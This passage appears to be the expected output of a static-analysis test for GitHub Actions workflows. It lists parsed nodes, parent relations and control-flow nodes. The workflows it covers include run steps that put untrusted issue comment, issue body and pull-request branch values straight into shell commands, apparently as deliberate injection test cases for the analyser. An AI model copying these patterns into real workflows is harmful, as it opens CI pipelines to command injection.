.github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +uses +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +stepUses +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +usesArgs +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +runStepChildren +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +parentNodes +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +cfgNodes +| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline.yml:1:1:33:14 | enter 